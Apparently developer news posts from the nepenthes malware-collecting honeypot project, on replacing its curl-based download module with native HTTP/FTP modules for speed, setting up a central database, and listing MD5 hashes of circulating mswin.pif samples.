  • this ‘just every second’ thing makes the use of curl _very_ slow in nepenthes, the link never gets saturated.
    • example #1: hostip lookup using curl in nepenthes takes 6 seconds, not using curl this can be done in 0.3 seconds
    • example #2: downloading a file via http using curl in nepenthes you will get 6-8k average, without curl you can get what the link can do for you.

the solution:

• complete replace download-curl
  • download-ftp already replaces the ftp part
  • download-http will replace the http part

• submit-norman relies on libcurl for http posting.
  • uploadmanager and upload http will take care of this.
• submit-xmlrpc can use uploadmanager and upload http too.

just to repeat it: this is not a curl problem, this latency boost & saturation loss is the result of the time download-curl has to wait before it can act, as nepenthes cant poll curls sockets.

all in all i liked curl, easy api, rocksolid.
im sure my own protocol implementations wont offer all the features curl offers, but

• this change will remove code redunancy
  • submit-xmlrpc already implements its own http poster
  • submit-norman currently uses curl
• improve speed in geolocation lookups using hostip.info
• speedup file downloads
• we will offer upload-curl too

and it will be easy to write something like submit-ftp.

The good news first:
We got a central server, we got a working database.

Using this database we will be able to create a realtime visualisation.

Bad news:
Our two main sensors went down due to hardware issues. So testing the new stuff will take some more time.
If you want to help testing the fresh code, subscribe to the nepenthes-devel mailing list, we will offer a first snapshot for testing there during the next days.

Currently we experience a high activity of mswin.pif and mswin32.pif, we got 2 different variants of mswin.pif.

#1 7c9b570ef067ddab504fcd20d965e1ea mswin.pif
#2 867ee46fe52bac55f043f779ab04be36 mswin32.pif
#3 c6e42265d033e02f8d60bca1fd7da824 mswin.pif